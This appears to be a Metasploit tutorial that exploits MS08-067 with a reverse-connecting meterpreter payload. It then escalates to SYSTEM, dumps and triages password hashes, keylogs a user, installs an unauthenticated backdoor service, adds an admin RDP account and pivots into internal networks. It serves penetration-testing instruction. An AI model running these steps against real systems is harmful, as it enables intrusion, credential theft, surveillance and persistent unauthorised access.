Meterpreter is an advanced, stealthy, multifaceted, and dynamically extensible payload. It is delivered as a reflective DLL that loads itself directly into the memory of a process on the target, rather than being written to disk as an ordinary executable. Scripts and extensions can be loaded at runtime to extend post-exploitation activity, including privilege escalation, dumping local account hashes, keylogging, installing a persistent backdoor service, and enabling Remote Desktop. Moreover, the communication channel between the meterpreter shell and the attacker is encrypted by default.
The following commands exploit the MS08-067 vulnerability in the Windows Server service and deliver a meterpreter payload that connects back to us over TCP:
msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(ms08_067_netapi) > show payloads
...
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
...
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.3
LHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.0.3:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.0.7
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.7:1029) at Sun Nov 14 02:44:26 +0000 2010
meterpreter> help
...
As you can see, we have successfully acquired a meterpreter shell. Typing help lists the commands available to us. Let's check our current privileges and escalate them to SYSTEM using the getsystem command provided by the priv extension:
meterpreter> getuid
Server username: CUSTDESK\salesdept
meterpreter> use priv
meterpreter>getsystem -h
...
This lists the techniques available for elevating our privileges (a specific one can be chosen with the -t option). Running getsystem without any options tries each technique in turn against the target and stops at the first one that succeeds:
meterpreter>getsystem
...got system (via technique 1).
meterpreter> getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter>sysinfo
Computer: CUSTDESK
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
If you run exploit -j -z instead, the exploit is pushed to the background as a job and you are not dropped into an interactive meterpreter shell. Once a session has been established, list the active sessions with sessions -l to find its ID, then interact with it using sessions -i ID.
Let's use the power of the meterpreter shell to dump the local account hashes held by the target. hashdump reads them out of the SAM, which requires the SYSTEM privileges we just obtained, and prints them in pwdump format (user:RID:LM hash:NT hash:::). These hashes cannot be reversed directly, but they can be cracked offline with several tools and techniques. Run the following command:
meterpreter> run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 71e52ce6b86e5da0c213566a1236f892...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:d2cd5d550e14593b12787245127c866d:d3e35f657c924d0b31eb811d2d986df9:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c8edf0d0db48cbf7b2835ec013cfb9c5:::
Momin Desktop:1003:ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a769204beb12283678:::
IUSR_MOMINDESK:1004:a751dcb6ea9323026eb8f7854da74a24:b0196523134dd9a21bf6b80e02744513:::
ASPNET:1005:ad785822109dd077027175f3382059fd:21ff86d627bcf380a5b1b6abe5d8e1dd:::
IWAM_MOMINDESK:1009:12a75a1d0cf47cd0c8e2f82a92190b42:c74966d83d519ba41e5196e00f94e113:::
h4x:1010:ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a769204beb12283678:::
salesdept:1011:8f51551614ded19365b226f9bfc33fab:7ad83174aadb77faac126fdd377b1693:::
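The dump above can be triaged before any cracking starts, because the LM and NT hashes leak information about the password on their own. The following Python script is an added example (it is not from the original tutorial and is not part of Metasploit): it parses pwdump-format lines like the ones above, reports what each LM/NT pair reveals, and groups accounts that share an NT hash. The sample input is constructed from the accounts listed above, trimmed to six, and includes the stray line from the capture to show that junk is skipped.

```python
"""Triage a meterpreter hashdump (pwdump-format) listing.

Added example, not part of the original tutorial or of Metasploit. It parses
``user:RID:LM:NT:::`` lines, classifies each account by what its LM and NT
hashes reveal before any cracking is attempted, and groups accounts that share
an NT hash (and therefore a password).
"""
from collections import defaultdict

# Well-known hashes of the empty string. An LM hash is two independent 8-byte
# halves, each derived from 7 bytes of the (uppercased, null-padded) password,
# so a half equal to EMPTY_LM_HALF means that half of the password is empty.
EMPTY_LM_HALF = "aad3b435b51404ee"
EMPTY_LM = EMPTY_LM_HALF * 2
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Sample input constructed from the dump shown above (six accounts plus the
# stray "h" line that appeared in the capture).
SAMPLE_DUMP = """\
h
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:d2cd5d550e14593b12787245127c866d:d3e35f657c924d0b31eb811d2d986df9:::
Momin Desktop:1003:ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a769204beb12283678:::
h4x:1010:ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a769204beb12283678:::
salesdept:1011:8f51551614ded19365b226f9bfc33fab:7ad83174aadb77faac126fdd377b1693:::
"""


def parse_pwdump(text):
    """Return a list of (user, rid, lm, nt) for each well-formed line; skip junk."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # not a pwdump record (e.g. the stray "h" line)
        user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            continue
        records.append((user, rid, lm, nt))
    return records


def classify(lm, nt):
    """Describe what the LM/NT pair tells us before cracking."""
    if nt == EMPTY_NT:
        return "blank password"
    if lm == EMPTY_LM:
        return "no LM hash (password longer than 14 chars or LM storage disabled): crack NT only"
    if lm.endswith(EMPTY_LM_HALF):
        return "LM hash present, password is 1-7 characters: trivially crackable"
    return "LM hash present, password is 8-14 characters: crack LM, then fix case against NT"


def triage(text):
    """Return ({user: verdict}, {nt_hash: [users]}) where the second map lists
    non-blank NT hashes shared by more than one account (same password)."""
    records = parse_pwdump(text)
    verdicts = {user: classify(lm, nt) for user, _, lm, nt in records}
    by_nt = defaultdict(list)
    for user, _, _, nt in records:
        by_nt[nt].append(user)
    shared = {h: users for h, users in by_nt.items() if len(users) > 1 and h != EMPTY_NT}
    return verdicts, shared


if __name__ == "__main__":
    verdicts, shared = triage(SAMPLE_DUMP)
    for user, verdict in verdicts.items():
        print(f"{user:15} {verdict}")
    for h, users in shared.items():
        print(f"shared NT hash {h}: {', '.join(users)} use the same password")
```

On the dump above this flags Administrator and Guest as having blank passwords, shows that Momin Desktop and h4x share one password of at most seven characters (their LM hash ends in the empty half), and leaves HelpAssistant and salesdept as 8-14 character passwords where the LM hash is still the cheap way in.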
Now, let's take this activity further by recording keystrokes with the keylogging capability of the meterpreter shell, which may reveal some useful data from our target. First confirm our privileges and list the running processes:
meterpreter> getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter> ps
Process list
============
 PID   Name           Arch  Session  User                        Path
 ---   ----           ----  -------  ----                        ----
 0     [System Process]
 4     System         x86   0        NT AUTHORITY\SYSTEM
 384   smss.exe       x86   0        NT AUTHORITY\SYSTEM         \SystemRoot\System32\smss.exe
 488   csrss.exe      x86   0        NT AUTHORITY\SYSTEM         \??\C:\WINDOWS\system32\csrss.exe
 648   winlogon.exe   x86   0        NT AUTHORITY\SYSTEM         \??\C:\WINDOWS\system32\winlogon.exe
 692   services.exe   x86   0        NT AUTHORITY\SYSTEM         C:\WINDOWS\system32\services.exe
 704   lsass.exe      x86   0        NT AUTHORITY\SYSTEM         C:\WINDOWS\system32\lsass.exe
 ...
 148   alg.exe        x86   0        NT AUTHORITY\LOCAL SERVICE  C:\WINDOWS\System32\alg.exe
 3172  explorer.exe   x86   0        CUSTDESK\salesdept          C:\WINDOWS\Explorer.EXE
 3236  reader_sl.exe  x86   0        CUSTDESK\salesdept          C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe
At this stage, we migrate the meterpreter session into the explorer.exe process (PID 3172). The keystroke sniffer captures input in the desktop session of the process meterpreter is running in, so moving into the logged-on user's explorer.exe lets us record that user's activity; note that we give up SYSTEM for as long as we live in that process:
meterpreter> migrate 3172
[*] Migrating to 3172...
[*] Migration completed successfully.
meterpreter> getuid
Server username: CUSTDESK\salesdept
meterpreter>keyscan_start
Starting the keystroke sniffer...
We have now started our keylogger and should wait some time for recorded keystrokes to accumulate before dumping them:
meterpreter>keyscan_dump
Dumping captured keystrokes...
<Return> www.yahoo.com <Return><Back> www.bbc.co.uk <Return>
meterpreter>keyscan_stop
Stopping the keystroke sniffer...
As you can see, we have captured the target's web-surfing activity. Similarly, we could capture the credentials of users logging into the system by migrating into the winlogon.exe process (PID 648), which handles the interactive logon prompt, and running the keystroke sniffer there.
You have exploited and gained access to the target system, but now want to keep that access even if the exploited service or application is patched later. This kind of activity is typically known as installing a backdoor service. Note that the backdoor service provided by meterpreter (metsvc) does not require any authentication before it accepts a connection on its network port: anyone who can reach that port on the target gets a SYSTEM shell. This may allow uninvited guests to access your target and poses a significant risk. Under the rules of engagement for a penetration test such activity is generally not allowed, so we strongly suggest you keep the backdoor service out of an official pentest environment unless it was explicitly permitted in writing during the scoping and rules-of-engagement phases. Start by obtaining a fresh session on the target:
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.0.3:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.0.7
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.7:1032) at Tue Nov 16 19:21:39 +0000 2010
meterpreter> ps
...
 292   alg.exe        x86   0        NT AUTHORITY\LOCAL SERVICE  C:\WINDOWS\System32\alg.exe
 1840  csrss.exe      x86   2        NT AUTHORITY\SYSTEM         \??\C:\WINDOWS\system32\csrss.exe
 528   winlogon.exe   x86   2        NT AUTHORITY\SYSTEM         \??\C:\WINDOWS\system32\winlogon.exe
 240   rdpclip.exe    x86   0        CUSTDESK\Momin Desktop      C:\WINDOWS\system32\rdpclip.exe
 1060  userinit.exe   x86   0        CUSTDESK\Momin Desktop      C:\WINDOWS\system32\userinit.exe
 1544  explorer.exe   x86   0        CUSTDESK\Momin Desktop      C:\WINDOWS\Explorer.EXE
...
meterpreter> migrate 1544
[*] Migrating to 1544...
[*] Migration completed successfully.
meterpreter> run metsvc -h
...
meterpreter> run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory
C:\DOCUME~1\MOMIND~1\LOCALS~1\Temp\oNyLOPeS...
[*] >> Uploading metsrv.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.
So, we have installed and started the backdoor service on our target. It listens on TCP port 31337 (a bind payload), so we close the current meterpreter session and, whenever we want to reconnect, use exploit/multi/handler with the windows/metsvc_bind_tcp payload pointed at that port:
meterpreter> exit
[*] Meterpreter session 1 closed. Reason: User exit
msf exploit(ms08_067_netapi) > back
msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started bind handler
[*] Meterpreter session 2 opened (192.168.0.3:37251 -> 192.168.0.7:31337) at Tue Nov 16 20:02:05 +0000 2010
meterpreter> getuid
Server username: NT AUTHORITY\SYSTEM
Let's use another useful meterpreter script, getgui, to enable Remote Desktop access to our target. The following exercise creates a new local user on the target, adds it to the Remote Desktop Users and Administrators groups, and enables the Remote Desktop service if it was disabled:
meterpreter> run getgui -u btuser -p btpass
[*] Windows Remote Desktop Configuration Meterpreter Script by
Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Language set by user to: 'en_EN'
[*] Setting user account for logon
[*] Adding User: btuser with Password: btpass
[*] Adding User: btuser to local group 'Remote Desktop Users'
[*] Adding User: btuser to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -rc
/root/.msf3/logs/scripts/getgui/clean_up__20101116.3447.rc
Now we can log into our target over RDP using the rdesktop program, supplying the account we just created, by entering the following command in another terminal:
# rdesktop -u btuser -p btpass 192.168.0.7:3389
Note that if you already hold a cracked password for an existing user on the target machine, you can simply run getgui -e to enable the Remote Desktop service instead of adding a new user. Additionally, don't forget to clean up your tracks by executing the getgui clean-up resource script cited at the end of the previous output, which removes the added account and reverts the Remote Desktop configuration changes.
How do we extend the attack into a deeper part of the targeted network that is not reachable from the outside? Metasploit can display and add routes to a destination network with the msfconsole command route add targetSubnet targetSubnetMask SessionId (for example, route add 10.2.4.0 255.255.255.0 1); route print shows the current table. Here SessionId is an existing meterpreter session that acts as the gateway, and targetSubnet is a network (for example, the one on the second interface of a dual-homed host) that lies beyond our compromised target. Once Metasploit routes traffic for that subnet through the compromised host's session, its modules can reach a network that is otherwise non-routable from our side. This is commonly known as pivoting.
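When several routes overlap (a /24 through one session and the enclosing /16 through another), which session carries a given connection is decided by the most specific matching route. The following Python script is an added example, not from the original tutorial and not Metasploit's own code: it models the route table that route add feeds and picks the session for a destination by longest-netmask match, the same rule Metasploit's Rex switchboard applies. The route entries are constructed for the example; session 1 stands for the CUSTDESK foothold from this chapter and session 2 for a hypothetical second pivot deeper in the network.

```python
"""Select the meterpreter session a Metasploit route would send traffic through.

Added example, not part of the tutorial or of Metasploit. Each route is
(subnet, netmask, session id) exactly as given to ``route add``; a destination
is matched against every entry and the most specific match (longest netmask)
wins. A destination matching no entry goes out the local interface (None).
"""
import ipaddress


def add_route(table, subnet, netmask, session_id):
    """Append a route the way ``route add <subnet> <netmask> <session>`` does."""
    net = ipaddress.IPv4Network(f"{subnet}/{netmask}", strict=False)
    table.append((net, session_id))
    return table


def best_session(table, dest):
    """Return the session id of the most specific route covering dest, or None."""
    addr = ipaddress.IPv4Address(dest)
    best, best_len = None, -1
    for net, session_id in table:
        # Longest-prefix match: a /24 beats a /16 that also contains the address.
        if addr in net and net.prefixlen > best_len:
            best, best_len = session_id, net.prefixlen
    return best


# Constructed route table: session 1 is the CUSTDESK foothold from this chapter,
# session 2 a hypothetical second pivot reached through it.
ROUTES = []
add_route(ROUTES, "10.2.0.0", "255.255.0.0", 2)
add_route(ROUTES, "10.2.4.0", "255.255.255.0", 1)


if __name__ == "__main__":
    for dest in ("10.2.4.25", "10.2.9.1", "192.168.0.7"):
        print(f"{dest:12} -> session {best_session(ROUTES, dest)}")
```

The order in which the routes were added does not matter: 10.2.4.25 goes through session 1 because the /24 is more specific, 10.2.9.1 falls back to the /16 through session 2, and 192.168.0.7 (the compromised host itself, on our own LAN) matches nothing and is contacted directly.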